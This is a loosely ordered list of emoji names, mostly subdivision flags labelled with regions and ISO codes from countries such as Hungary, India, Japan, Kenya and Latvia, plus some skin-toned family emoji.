🏴 Flag for Sud (HT-SD)
🏴 Flag for Nord-Ouest (HT-NO)
🏴 Flag for Heves (HU-HE)
🏴 Flag for Bács-Kiskun (HU-BK)
🏴 Flag for Miskolc (HU-MI)
🏴 Flag for Érd (HU-ER)
👨🏽👨🏽👦🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Nippes (HT-NI)
🏴 Flag for Szolnok (HU-SK)
🏴 Flag for Nord (HT-ND)
🏴 Flag for Sud-Est (HT-SE)
🏴 Flag for Jász-Nagykun-Szolnok (HU-JN)
🏴 Flag for Pécs (HU-PS)
🏴 Flag for Kecskemét (HU-KM)
🏴 Flag for Debrecen (HU-DE)
🏴 Flag for Békés (HU-BE)
🏴 Flag for Nógrád (HU-NO)
🏴 Flag for Szombathely (HU-SH)
🏴 Flag for Győr (HU-GY)
🏴 Flag for Lesser Sunda Islands (ID-NU)
🏴 Flag for Tatabánya (HU-TB)
🏴 Flag for Java (ID-JW)
🏴 Flag for Chandigarh (IN-CH)
🏴 Flag for Gujarat (IN-GJ)
🏴 Flag for Leinster (IE-L)
🏴 Flag for Zala (HU-ZA)
🏴 Flag for Daman and Diu (IN-DD)
🏴 Flag for Tel Aviv District (IL-TA)
🏴 Flag for Sulawesi (ID-SL)
🏴 Flag for Arunachal Pradesh (IN-AR)
🏴 Flag for Veszprém County (HU-VE)
🏴 Flag for Andaman and Nicobar Islands (IN-AN)
🏴 Flag for Somogy (HU-SO)
🏴 Flag for Vas (HU-VA)
🏴 Flag for Jerusalem (IL-JM)
🏴 Flag for Dadra and Nagar Haveli (IN-DN)
🏴 Flag for Veszprém (HU-VM)
🏴 Flag for Salgótarján (HU-ST)
🏴 Flag for Chhattisgarh (IN-CT)
🏴 Flag for Ulster (IE-U)
🏴 Flag for Delhi (IN-DL)
🏴 Flag for Munster (IE-M)
🏴 Flag for Connacht (IE-C)
🏴 Flag for Haifa District (IL-HA)
🏴 Flag for Kalimantan (ID-KA)
🏴 Flag for Goa (IN-GA)
🏴 Flag for Sumatra (ID-SM)
🏴 Flag for Papua Islands (ID-PP)
🏴 Flag for Szekszárd (HU-SS)
🏴 Flag for Northern District (IL-Z)
🏴 Flag for Tolna (HU-TO)
🏴 Flag for Central District (IL-M)
🏴 Flag for Southern District (IL-D)
🏴 Flag for Bihar (IN-BR)
🏴 Flag for Zalaegerszeg (HU-ZE)
🏴 Flag for Andhra Pradesh (IN-AP)
🏴 Flag for Dohuk (IQ-DA)
🏴 Flag for Jharkhand (IN-JH)
🏴 Flag for Kerala (IN-KL)
🏴 Flag for West Bengal (IN-WB)
🏴 Flag for Odisha (IN-OR)
🏴 Flag for Puducherry (IN-PY)
🏴 Flag for Karbala (IQ-KA)
🏴 Flag for Saladin (IQ-SD)
🏴 Flag for Mizoram (IN-MZ)
🏴 Flag for Himachal Pradesh (IN-HP)
🏴 Flag for Madhya Pradesh (IN-MP)
🏴 Flag for Punjab (IN-PB)
🏴 Flag for Nagaland (IN-NL)
🏴 Flag for Al-Qādisiyyah (IQ-QA)
🏴 Flag for Diyala (IQ-DI)
🏴 Flag for Nineveh (IQ-NI)
🏴 Flag for Dhi Qar (IQ-DQ)
🏴 Flag for Meghalaya (IN-ML)
🏴 Flag for Tamil Nadu (IN-TN)
🏴 Flag for Najaf (IQ-NA)
🏴 Flag for Al Muthanna (IQ-MU)
🏴 Flag for Telangana (IN-TG)
🏴 Flag for Haryana (IN-HR)
🏴 Flag for Uttarakhand (IN-UT)
🏴 Flag for Tripura (IN-TR)
🏴 Flag for Baghdad (IQ-BG)
🏴 Flag for Lakshadweep (IN-LD)
🏴 Flag for Maysan (IQ-MA)
🏴 Flag for Basra (IQ-BA)
🏴 Flag for Erbil (IQ-AR)
🏴 Flag for Maharashtra (IN-MH)
🏴 Flag for Al Anbar (IQ-AN)
🏴 Flag for Sikkim (IN-SK)
🏴 Flag for Babylon (IQ-BB)
🏴 Flag for Uttar Pradesh (IN-UP)
🏴 Flag for Sulaymaniyah (IQ-SU)
🏴 Flag for Rajasthan (IN-RJ)
🏴 Flag for Jammu and Kashmir (IN-JK)
🏴 Flag for Chaharmahal and Bakhtiari (IR-08)
🏴 Flag for Qom (IR-26)
🏴 Flag for Capital (IS-1)
👨🏾👨🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Ardabil (IR-03)
🏴 Flag for Yazd (IR-25)
🏴 Flag for South Khorasan (IR-29)
👨🏿👨🏿👦🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Hamadan (IR-24)
🏴 Flag for Mahaica-Berbice (GY-MA)
🏴 Flag for Western (IS-3)
🏴 Flag for Golestan (IR-27)
🏴 Flag for Zanjan (IR-11)
🏴 Flag for Lorestan (IR-20)
🏴 Flag for Kermanshah (IR-17)
🏴 Flag for Kohgiluyeh and Boyer-Ahmad (IR-18)
🏴 Flag for Cairo (EG-C)
🏴 Flag for North Khorasan (IR-31)
🏴 Flag for Bushehr (IR-06)
🏴 Flag for Extremadura (ES-EX)
🏴 Flag for Canary Islands (ES-CN)
🏴 Flag for Eastern (IS-7)
🏴 Flag for Ilam (IR-05)
🏴 Flag for Qazvin (IR-28)
🏴 Flag for Isfahan (IR-04)
🏴 Flag for Kerman (IR-15)
🏴 Flag for Hormozgan (IR-23)
🏴 Flag for Wasit (IQ-WA)
🏴 Flag for Piedmont (IT-21)
🏴 Flag for Northeastern (IS-6)
🏴 Flag for Northwestern (IS-5)
🏴 Flag for Markazi (IR-22)
🏴 Flag for Gilan (IR-19)
🏴 Flag for Khuzestan (IR-10)
🏴 Flag for Semnan (IR-12)
🏴 Flag for Southern Peninsula (IS-2)
🏴 Flag for Manchester (JM-12)
🏴 Flag for Irbid (JO-IR)
🏴 Flag for Saint Mary (JM-05)
🏴 Flag for Basilicata (IT-77)
🏴 Flag for Friuli–Venezia Giulia (IT-36)
🏴 Flag for Clarendon (JM-13)
🏴 Flag for Marche (IT-57)
🏴 Flag for Portland (JM-04)
🏴 Flag for Sicily (IT-82)
🏴 Flag for Veneto (IT-34)
🏴 Flag for Abruzzo (IT-65)
🏴 Flag for Molise (IT-67)
🏴 Flag for Balqa (JO-BA)
🏴 Flag for Apulia (IT-75)
🏴 Flag for Calabria (IT-78)
🏴 Flag for Tuscany (IT-52)
🏴 Flag for Hanover (JM-09)
🏴 Flag for Saint Andrew (JM-02)
🏴 Flag for Tafilah (JO-AT)
🏴 Flag for Umbria (IT-55)
🏴 Flag for Saint James (JM-08)
🏴 Flag for Saint Ann (JM-06)
🏴 Flag for Saint Elizabeth (JM-11)
🏴 Flag for Zarqa (JO-AZ)
🏴 Flag for Ostrobothnia (FI-12)
🏴 Flag for Lazio (IT-62)
🏴 Flag for Ajloun (JO-AJ)
🏴 Flag for Liguria (IT-42)
🏴 Flag for Trelawny (JM-07)
🏴 Flag for Aqaba (JO-AQ)
🏴 Flag for Jerash (JO-JA)
🏴 Flag for Amman (JO-AM)
🏴 Flag for Aosta Valley (IT-23)
🏴 Flag for Westmoreland (JM-10)
🏴 Flag for Ibaraki (JP-08)
🏴 Flag for Madaba (JO-MD)
🏴 Flag for Shimane (JP-32)
🏴 Flag for Kyōto (JP-26)
🏴 Flag for Araucanía (CL-AR)
🏴 Flag for Tochigi (JP-09)
🏴 Flag for Akita (JP-05)
🏴 Flag for Chiba (JP-12)
🏴 Flag for Miyagi (JP-04)
🏴 Flag for Niigata (JP-15)
🏴 Flag for Toyama (JP-16)
🏴 Flag for Aichi (JP-23)
🏴 Flag for Tokushima (JP-36)
🏴 Flag for Nagano (JP-20)
🏴 Flag for Tottori (JP-31)
🏴 Flag for Iwate (JP-03)
🏴 Flag for Okayama (JP-33)
🏴 Flag for Ishikawa (JP-17)
🏴 Flag for Wakayama (JP-30)
🏴 Flag for Gunma (JP-10)
🏴 Flag for Mafraq (JO-MA)
🏴 Flag for Yamaguchi (JP-35)
🏴 Flag for Granma (CU-12)
🏴 Flag for Shiga (JP-25)
🏴 Flag for Aomori (JP-02)
🏴 Flag for Saitama (JP-11)
🏴 Flag for Nara (JP-29)
🏴 Flag for Yamanashi (JP-19)
🏴 Flag for Hiroshima (JP-34)
🏴 Flag for Ma’an (JO-MN)
🏴 Flag for Shizuoka (JP-22)
🏴 Flag for Ōsaka (JP-27)
🏴 Flag for Mie (JP-24)
🏴 Flag for Yamagata (JP-06)
🏴 Flag for Hyōgo (JP-28)
🏴 Flag for Karak (JO-KA)
🏴 Flag for Ehime (JP-38)
🏴 Flag for Kanagawa (JP-14)
🏴 Flag for Kagawa (JP-37)
🏴 Flag for Garissa (KE-07)
🏴 Flag for Mandera (KE-24)
🏴 Flag for Kagoshima (JP-46)
🏴 Flag for Kisumu (KE-17)
🏴 Flag for Kilifi (KE-14)
🏴 Flag for Kirinyaga (KE-15)
🏴 Flag for Kajiado (KE-10)
🏴 Flag for Bungoma (KE-03)
🏴 Flag for Nandi (KE-32)
🏴 Flag for Kiambu (KE-13)
🏴 Flag for Laikipia (KE-20)
🏴 Flag for Lamu (KE-21)
🏴 Flag for Fukuoka (JP-40)
🏴 Flag for Busia (KE-04)
🏴 Flag for Saga (JP-41)
🏴 Flag for Migori (KE-27)
🏴 Flag for Embu (KE-06)
👩🏾👦🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Kericho (KE-12)
🏴 Flag for Isiolo (KE-09)
🏴 Flag for Kwale (KE-19)
🏴 Flag for Nagasaki (JP-42)
🏴 Flag for Nairobi County (KE-30)
🏴 Flag for Makueni (KE-23)
🏴 Flag for Murang’a (KE-29)
🏴 Flag for Kōchi (JP-39)
🏴 Flag for Bomet (KE-02)
🏴 Flag for Mombasa (KE-28)
🏴 Flag for Homa Bay (KE-08)
🏴 Flag for Kakamega (KE-11)
🏴 Flag for Machakos (KE-22)
🏴 Flag for Kisii (KE-16)
🏴 Flag for Elgeyo-Marakwet (KE-05)
🏴 Flag for Ōita (JP-44)
🏴 Flag for Narok (KE-33)
🏴 Flag for Meru (KE-26)
🏴 Flag for Kumamoto (JP-43)
🏴 Flag for Miyazaki (JP-45)
🏴 Flag for Stung Treng (KH-19)
🏴 Flag for Samburu (KE-37)
🏴 Flag for West Pokot (KE-47)
🏴 Flag for Taita-Taveta (KE-39)
🏴 Flag for Prey Veng (KH-14)
🏴 Flag for Tharaka-Nithi (KE-41)
🏴 Flag for Osh Region (KG-O)
🏴 Flag for Tbong Khmum (KH-25)
🏴 Flag for Talas (KG-T)
🏴 Flag for Phnom Penh (KH-12)
🏴 Flag for Bishkek (KG-GB)
🏴 Flag for Uasin Gishu (KE-44)
🏴 Flag for Kep (KH-23)
🏴 Flag for Kratié (KH-10)
🏴 Flag for Takéo (KH-21)
🏴 Flag for Battambang (KH-2)
🏴 Flag for Nyeri (KE-36)
🏴 Flag for Preah Vihear (KH-13)
🏴 Flag for Tana River (KE-40)
🏴 Flag for Pailin (KH-24)
🏴 Flag for Ratanakiri (KH-16)
🏴 Flag for Oddar Meanchey (KH-22)
🏴 Flag for Trans Nzoia (KE-42)
🏴 Flag for Sihanoukville (KH-18)
🏴 Flag for Vihiga (KE-45)
🏴 Flag for Osh (KG-GO)
🏴 Flag for Batken (KG-B)
🏴 Flag for Jalal-Abad (KG-J)
🏴 Flag for Mondulkiri (KH-11)
🏴 Flag for Siem Reap (KH-17)
🏴 Flag for Turkana (KE-43)
🏴 Flag for Banteay Meanchey (KH-1)
🏴 Flag for Naryn (KG-N)
🏴 Flag for Nyandarua (KE-35)
🏴 Flag for Siaya (KE-38)
🏴 Flag for Nyamira (KE-34)
🏴 Flag for Pursat (KH-15)
🏴 Flag for Wajir (KE-46)
🏴 Flag for Issyk-Kul (KG-Y)
🏴 Flag for Chuy (KG-C)
🏴 Flag for Mohéli (KM-M)
🏴 Flag for Seoul (KR-11)
🏴 Flag for Kampong Chhnang (KH-4)
🏴 Flag for Daejeon (KR-30)
🏴 Flag for South Hwanghae (KP-05)
🏴 Flag for Kampot (KH-7)
🏴 Flag for Nevis (KN-N)
🏴 Flag for Chagang (KP-04)
🏴 Flag for South Jeolla (KR-46)
🏴 Flag for North Hwanghae (KP-06)
🏴 Flag for Saint Kitts (KN-K)
🏴 Flag for Kampong Speu (KH-5)
🏴 Flag for North Jeolla (KR-45)
🏴 Flag for North Pyongan (KP-03)
🏴 Flag for Koh Kong (KH-9)
🏴 Flag for Kangwon (KP-07)
🏴 Flag for Busan (KR-26)
🏴 Flag for Gwangju City (KR-29)
🏴 Flag for Kampong Cham (KH-3)
🏴 Flag for North Chungcheong (KR-43)
🏴 Flag for Kandal (KH-8)
🏴 Flag for Kampong Thom (KH-6)
🏴 Flag for Ryanggang (KP-10)
🏴 Flag for South Pyongan (KP-02)
🏴 Flag for Grande Comore (KM-G)
🏴 Flag for South Hamgyong (KP-08)
🏴 Flag for Rason (KP-13)
🏴 Flag for Daegu (KR-27)
🏴 Flag for Incheon (KR-28)
🏴 Flag for Gangwon (KR-42)
🏴 Flag for Pyongyang (KP-01)
🏴 Flag for Ulsan (KR-31)
🏴 Flag for South Chungcheong (KR-44)
🏴 Flag for Anjouan (KM-A)
🏴 Flag for Gyeonggi (KR-41)
🏴 Flag for North Gyeongsang (KR-47)
🏴 Flag for North Hamgyong (KP-09)
🏴 Flag for Houaphanh (LA-HO)
🏴 Flag for Bayqongyr (KZ-BAY)
🏴 Flag for Champasak (LA-CH)
🏴 Flag for Vientiane (LA-VT)
🏴 Flag for Hawalli (KW-HA)
🏴 Flag for Phongsaly (LA-PH)
🏴 Flag for Pavlodar (KZ-PAV)
🏴 Flag for Almaty Region (KZ-ALM)
🏴 Flag for Al Asimah (KW-KU)
🏴 Flag for Bokeo (LA-BK)
🏴 Flag for Attapeu (LA-AT)
🏴 Flag for Aktobe (KZ-AKT)
🏴 Flag for Atyrau (KZ-ATY)
🏴 Flag for Al Jahra (KW-JA)
🏴 Flag for Bolikhamsai (LA-BL)
🏴 Flag for Oudomxay (LA-OU)
🏴 Flag for Mangystau (KZ-MAN)
🏴 Flag for West Kazakhstan (KZ-ZAP)
🏴 Flag for Jambyl (KZ-ZHA)
🏴 Flag for Astana (KZ-AST)
🏴 Flag for Luang Prabang (LA-LP)
🏴 Flag for Al Farwaniyah (KW-FA)
🏴 Flag for Kostanay (KZ-KUS)
🏴 Flag for Almaty (KZ-ALA)
🏴 Flag for Karagandy (KZ-KAR)
🏴 Flag for Kyzylorda (KZ-KZY)
🏴 Flag for Salavan (LA-SL)
🏴 Flag for Luang Namtha (LA-LM)
🏴 Flag for Sejong (KR-50)
🏴 Flag for Mubarak Al-Kabeer (KW-MU)
🏴 Flag for North Kazakhstan (KZ-SEV)
👩🏿👦🏿👧🏿 Family - Woman: Dark Skin Tone, Boy: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Al Ahmadi (KW-AH)
🏴 Flag for Khammouane (LA-KH)
🏴 Flag for Akmola (KZ-AKM)
🏴 Flag for South Kazakhstan (KZ-YUZ)
🏴 Flag for Triesen (LI-09)
👨🏽👨🏽👦🏽👦🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone, Boy: Medium Skin Tone
👩🏻👦🏻👶🏻 Family - Woman: Light Skin Tone, Boy: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for North Central (LK-7)
🏴 Flag for Sainyabuli (LA-XA)
🏴 Flag for Akkar (LB-AK)
🏴 Flag for Laborie (LC-07)
🏴 Flag for Gros Islet (LC-06)
🏴 Flag for North (LB-AS)
🏴 Flag for Balzers (LI-01)
🏴 Flag for Central (LK-2)
🏴 Flag for Mauren (LI-04)
🏴 Flag for Nabatieh (LB-NA)
🏴 Flag for Dennery (LC-05)
🏴 Flag for South (LB-JA)
🏴 Flag for Vaduz (LI-11)
🏴 Flag for Castries (LC-02)
🏴 Flag for Uva (LK-8)
🏴 Flag for Triesenberg (LI-10)
🏴 Flag for Planken (LI-05)
🏴 Flag for Vieux Fort (LC-11)
🏴 Flag for Baalbek-Hermel (LB-BH)
🏴 Flag for North Western (LK-6)
🏴 Flag for Ruggell (LI-06)
🏴 Flag for Micoud (LC-08)
🏴 Flag for Eschen (LI-02)
🏴 Flag for Canaries (LC-12)
🏴 Flag for Beirut (LB-BA)
🏴 Flag for Xiangkhouang (LA-XI)
🏴 Flag for Soufrière (LC-10)
🏴 Flag for Anse la Raye (LC-01)
🏴 Flag for Choiseul (LC-03)
🏴 Flag for Gamprin (LI-03)
🏴 Flag for Northern (LK-4)
🏴 Flag for Grand Bassa (LR-GB)
🏴 Flag for Gbarpolu (LR-GP)
🏴 Flag for Grand Gedeh (LR-GG)
🏴 Flag for Jurbarkas (LT-12)
🏴 Flag for Nimba (LR-NI)
🏴 Flag for Central Finland (FI-08)
🏴 Flag for Jonava (LT-10)
🏴 Flag for Margibi (LR-MG)
🏴 Flag for Sinoe (LR-SI)
🏴 Flag for Montserrado (LR-MO)
🏴 Flag for Kaunas (LT-16)
🏴 Flag for Thaba-Tseka (LS-K)
🏴 Flag for Birštonas (LT-05)
🏴 Flag for Mohale’s Hoek (LS-F)
🏴 Flag for Bomi (LR-BM)
🏴 Flag for Druskininkai (LT-07)
🏴 Flag for Kalvarija (LT-14)
🏴 Flag for Kauno Municipality (LT-15)
🏴 Flag for Qacha’s Nek (LS-H)
🏴 Flag for Anykščiai (LT-04)
🏴 Flag for Leribe (LS-C)
🏴 Flag for Joniškis (LT-11)
🏴 Flag for Lofa (LR-LO)
🏴 Flag for Rivercess (LR-RI)
🏴 Flag for Kaišiadorys (LT-13)
🏴 Flag for Elektrėnai (LT-08)
🏴 Flag for Grand Kru (LR-GK)
🏴 Flag for Berea (LS-D)
🏴 Flag for Quthing (LS-G)
🏴 Flag for Butha-Buthe (LS-B)
🏴 Flag for Akmenė (LT-01)
🏴 Flag for Ignalina (LT-09)
🏴 Flag for Mafeteng (LS-E)
🏴 Flag for Mokhotlong (LS-J)
🏴 Flag for Alytus (LT-03)
🏴 Flag for Biržai (LT-06)
🏴 Flag for Nana-Grébizi (CF-KB)
🏴 Flag for River Gee (LR-RG)
🏴 Flag for Utena (LT-54)
🏴 Flag for Molėtai (LT-27)
🏴 Flag for Šakiai (LT-41)
🏴 Flag for Kelmė (LT-19)
🏴 Flag for Kupiškis (LT-23)
🏴 Flag for Vilkaviškis (LT-56)
🏴 Flag for Neringa (LT-28)
🏴 Flag for Panevėžys (LT-33)
🏴 Flag for Pagėgiai (LT-29)
🏴 Flag for Šiaulių Municipality (LT-43)
🏴 Flag for Palanga (LT-31)
🏴 Flag for Kėdainiai (LT-18)
🏴 Flag for Rokiškis (LT-40)
🏴 Flag for Šilalė (LT-45)
🏴 Flag for Trakai (LT-52)
🏴 Flag for Pohnpei (FM-PNI)
🏴 Flag for Prienai (LT-36)
🏴 Flag for Telšiai (LT-51)
🏴 Flag for Klaipėda (LT-21)
🏴 Flag for Kazlų Rūda (LT-17)
🏴 Flag for Širvintos (LT-47)
🏴 Flag for Pakruojis (LT-30)
🏴 Flag for Šiauliai (LT-44)
🏴 Flag for Kretinga (LT-22)
🏴 Flag for Šilutė (LT-46)
🏴 Flag for Šalčininkai (LT-42)
🏴 Flag for Raseiniai (LT-38)
🏴 Flag for Varėna (LT-55)
🏴 Flag for Pasvalys (LT-34)
🏴 Flag for Plungė (LT-35)
🏴 Flag for Švenčionys (LT-49)
🏴 Flag for Radviliškis (LT-37)
🏴 Flag for Lazdijai (LT-24)
🏴 Flag for Tauragė (LT-50)
🏴 Flag for Skuodas (LT-48)
🏴 Flag for Ukmergė (LT-53)
🏴 Flag for Rietavas (LT-39)
🏴 Flag for Marijampolė (LT-25)
🏴 Flag for Mažeikiai (LT-26)
🏴 Flag for Baldone (LV-013)
🏴 Flag for Vilnius County (LT-VL)
🏴 Flag for Alsunga (LV-006)
🏴 Flag for Vilnius (LT-58)
🏴 Flag for Tauragė County (LT-TA)
🏴 Flag for Utena County (LT-UT)
🏴 Flag for Aizkraukle (LV-002)
🏴 Flag for Diekirch (LU-DI)
🏴 Flag for Marijampolė County (LT-MR)
👩🏽👨🏽👶🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Šiauliai County (LT-SA)
🏴 Flag for Echternach (LU-EC)
🏴 Flag for Redange (LU-RD)
🏴 Flag for Clervaux (LU-CL)
🏴 Flag for Visaginas (LT-59)
🏴 Flag for Ape (LV-009)
🏴 Flag for Amata (LV-008)
🏴 Flag for Alytus County (LT-AL)
🏴 Flag for Grevenmacher (LU-GR)
🏴 Flag for Aglona (LV-001)
🏴 Flag for Mersch (LU-ME)
🏴 Flag for Vianden (LU-VD)
🏴 Flag for Aloja (LV-005)
🏴 Flag for Mount Lebanon (LB-JL)
🏴 Flag for Kaunas County (LT-KU)
🏴 Flag for Zarasai (LT-60)
🏴 Flag for Wiltz (LU-WI)
🏴 Flag for Ādaži (LV-011)
🏴 Flag for Luxembourg (LU-LU)
🏴 Flag for Telšiai County (LT-TE)
🏴 Flag for Alūksne (LV-007)
🏴 Flag for Remich (LU-RM)
🏴 Flag for Aknīste (LV-004)
🏴 Flag for Esch-sur-Alzette (LU-ES)
🏴 Flag for Aizpute (LV-003)
🏴 Flag for Klaipėda County (LT-KL)
🏴 Flag for Dundaga (LV-027)
🏴 Flag for Jaunpils (LV-040)
🏴 Flag for Burtnieki (LV-019)
🏴 Flag for Balvi (LV-015)
🏴 Flag for Beverīna (LV-017)
🏴 Flag for Daugavpils Municipality (LV-025)
🏴 Flag for Cesvaine (LV-021)
🏴 Flag for Ilūkste (LV-036)
🏴 Flag for Kuldīga (LV-050)
🏴 Flag for Grobiņa (LV-032)
🏴 Flag for Gulbene (LV-033)
🏴 Flag for Kandava (LV-043)
🏴 Flag for Brocēni (LV-018)
🏴 Flag for Krimulda (LV-048)
🏴 Flag for Carnikava (LV-020)
🏴 Flag for Krustpils (LV-049)
👩🏾👨🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Dobele (LV-026)
🏴 Flag for Kocēni (LV-045)
🏴 Flag for Garkalne (LV-031)
🏴 Flag for Ērgļi (LV-030)
🏴 Flag for Durbe (LV-028)
🏴 Flag for Krāslava (LV-047)
🏴 Flag for Dagda (LV-024)
🏴 Flag for Jaunjelgava (LV-038)
🏴 Flag for Bauska (LV-016)
🏴 Flag for Baltinava (LV-014)
🏴 Flag for Jēkabpils Municipality (LV-042)
🏴 Flag for Jaunpiebalga (LV-039)
🏴 Flag for Cēsis (LV-022)
🏴 Flag for Iecava (LV-034)
🏴 Flag for Ķegums (LV-051)
🏴 Flag for Ikšķile (LV-035)
🏴 Flag for Cibla (LV-023)
🏴 Flag for Kārsava (LV-044)
🏴 Flag for Engure (LV-029)
🏴 Flag for Līgatne (LV-055)
🏴 Flag for Nīca (LV-066)
🏴 Flag for Mālpils (LV-061)
🏴 Flag for Kvemo Kartli (GE-KK)
🏴 Flag for Pārgauja (LV-070)
🏴 Flag for Lielvārde (LV-053)
🏴 Flag for Pļaviņas (LV-072)
🏴 Flag for Pāvilosta (LV-071)
🏴 Flag for Madona (LV-059)
🏴 Flag for Rauna (LV-076)
🏴 Flag for Limbaži (LV-054)
🏴 Flag for Naukšēni (LV-064)
🏴 Flag for Ķekava (LV-052)
🏴 Flag for Salaspils (LV-087)
🏴 Flag for Mērsrags (LV-063)
🏴 Flag for Olaine (LV-068)
🏴 Flag for Roja (LV-079)
🏴 Flag for Rucava (LV-081)
🏴 Flag for Rugāji (LV-082)
🏴 Flag for Ogre (LV-067)
🏴 Flag for Rūjiena (LV-084)
🏴 Flag for Saulkrasti (LV-089)
🏴 Flag for Saldus (LV-088)
🏴 Flag for Rundāle (LV-083)
🏴 Flag for Nereta (LV-065)
🏴 Flag for Ozolnieki (LV-069)
🏴 Flag for Ropaži (LV-080)
🏴 Flag for Riebiņi (LV-078)
🏴 Flag for Līvāni (LV-056)
🏴 Flag for Priekuļi (LV-075)
🏴 Flag for Ludza (LV-058)
🏴 Flag for Sēja (LV-090)
🏴 Flag for Priekule (LV-074)
🏴 Flag for Lubāna (LV-057)
🏴 Flag for Salacgrīva (LV-086)
🏴 Flag for Mārupe (LV-062)
🏴 Flag for Preiļi (LV-073)
🏴 Flag for Viesīte (LV-107)
🏴 Flag for Smiltene (LV-094)
🏴 Flag for Kufra (LY-KF)
🏴 Flag for Daugavpils (LV-DGV)
🏴 Flag for Tukums (LV-099)
👩🏿👨🏿👶🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Liepāja (LV-LPX)
🏴 Flag for Valka (LV-101)
🏴 Flag for Vārkava (LV-103)
🏴 Flag for Murqub (LY-MB)
🏴 Flag for Ventspils (LV-VEN)
🏴 Flag for Jabal al Akhdar (LY-JA)
🏴 Flag for Jēkabpils (LV-JKB)
🏴 Flag for Sigulda (LV-091)
🏴 Flag for Jabal al Gharbi (LY-JG)
🏴 Flag for Ghat (LY-GT)
🏴 Flag for Stopiņi (LV-095)
🏴 Flag for Riga (LV-RIX)
🏴 Flag for Derna (LY-DR)
🏴 Flag for Vaiņode (LV-100)
🏴 Flag for Varakļāni (LV-102)
🏴 Flag for Jelgava (LV-JEL)
🏴 Flag for Skrīveri (LV-092)
🏴 Flag for Talsi (LV-097)
🏴 Flag for Valmiera (LV-VMR)
🏴 Flag for Benghazi (LY-BA)
🏴 Flag for Rēzekne (LV-REZ)
🏴 Flag for Skrunda (LV-093)
🏴 Flag for Zilupe (LV-110)
🏴 Flag for Strenči (LV-096)
🏴 Flag for Jufra (LY-JU)
🏴 Flag for Vecpiebalga (LV-104)
🏴 Flag for Vecumnieki (LV-105)
🏴 Flag for Viļaka (LV-108)
🏴 Flag for Jūrmala (LV-JUR)
🏴 Flag for Viļāni (LV-109)
🏴 Flag for Tērvete (LV-098)
🏴 Flag for Grand Casablanca (MA-08)
🏴 Flag for Marj (LY-MJ)
🏴 Flag for Al Wahat (LY-WA)
🏴 Flag for Monte Carlo (MC-MC)
🏴 Flag for Guelmim-Es Semara (MA-14)
🏴 Flag for Zawiya (LY-ZA)
🏴 Flag for Gharb-Chrarda-Béni Hssen (MA-02)
🏴 Flag for Marrakesh-Tensift-El Haouz (MA-11)
🏴 Flag for Doukkala-Abda (MA-10)
👩🏽👩🏽👦🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Rabat-Salé-Zemmour-Zaer (MA-07)
🏴 Flag for Oued Ed-Dahab-Lagouira (MA-16)
🏴 Flag for Nalut (LY-NL)
🏴 Flag for Sabha (LY-SB)
🏴 Flag for Taza-Al Hoceima-Taounate (MA-03)
🏴 Flag for Jardin Exotique de Monaco (MC-JE)
🏴 Flag for Wadi al Shatii (LY-WS)
🏴 Flag for Larvotto (MC-LA)
🏴 Flag for Nuqat al Khams (LY-NQ)
🏴 Flag for Malbousquet (MC-MA)
🏴 Flag for Tadla-Azilal (MA-12)
🏴 Flag for La Condamine (MC-CO)
🏴 Flag for Monaco-Ville (MC-MO)
🏴 Flag for Chaouia-Ouardigha (MA-09)
🏴 Flag for Tangier-Tétouan (MA-01)
🏴 Flag for Moneghetti (MC-MG)
🏴 Flag for Murzuq (LY-MQ)
🏴 Flag for Meknès-Tafilalet (MA-06)
🏴 Flag for Fontvieille (MC-FO)
🏴 Flag for Wadi al Hayaa (LY-WD)
🏴 Flag for La Colle (MC-CL)
🏴 Flag for Sirte (LY-SR)
🏴 Flag for Misrata (LY-MI)
🏴 Flag for Fès-Boulemane (MA-05)
🏴 Flag for Tripoli (LY-TB)
🏴 Flag for La Gare (MC-GA)
👩🏾👩🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Edineț (MD-ED)
🏴 Flag for Hîncești (MD-HI)
🏴 Flag for Fălești (MD-FA)
🏴 Flag for Criuleni (MD-CR)
🏴 Flag for Sîngerei (MD-SI)
🏴 Flag for Soroca (MD-SO)
🏴 Flag for Cantemir (MD-CT)
🏴 Flag for Rezina (MD-RE)
🏴 Flag for Șoldănești (MD-SD)
🏴 Flag for Briceni (MD-BR)
🏴 Flag for Vallon de la Rousse (MC-VR)
🏴 Flag for Bălţi (MD-BA)
🏴 Flag for Dubăsari (MD-DU)
🏴 Flag for Călărași (MD-CL)
🏴 Flag for Spélugues (MC-SP)
🏴 Flag for Cahul (MD-CA)
🏴 Flag for Ialoveni (MD-IA)
🏴 Flag for Orhei (MD-OR)
🏴 Flag for Drochia (MD-DR)
🏴 Flag for Gagauzia (MD-GA)
🏴 Flag for Cimișlia (MD-CM)
🏴 Flag for Ocniţa (MD-OC)
🏴 Flag for Basarabeasca (MD-BS)
🏴 Flag for Strășeni (MD-ST)
🏴 Flag for Anenii Noi (MD-AN)
🏴 Flag for Moulins (MC-MU)
🏴 Flag for Bender (MD-BD)
🏴 Flag for Glodeni (MD-GL)
🏴 Flag for La Source (MC-SO)
🏴 Flag for Chișinău (MD-CU)
🏴 Flag for Dondușeni (MD-DO)
🏴 Flag for Florești (MD-FL)
🏴 Flag for Port Hercules (MC-PH)
🏴 Flag for Nisporeni (MD-NI)
🏴 Flag for Rîșcani (MD-RI)
🏴 Flag for Leova (MD-LE)
🏴 Flag for Ştefan Vodă (MD-SV)
🏴 Flag for Ungheni (MD-UN)
🏴 Flag for Toamasina (MG-A)
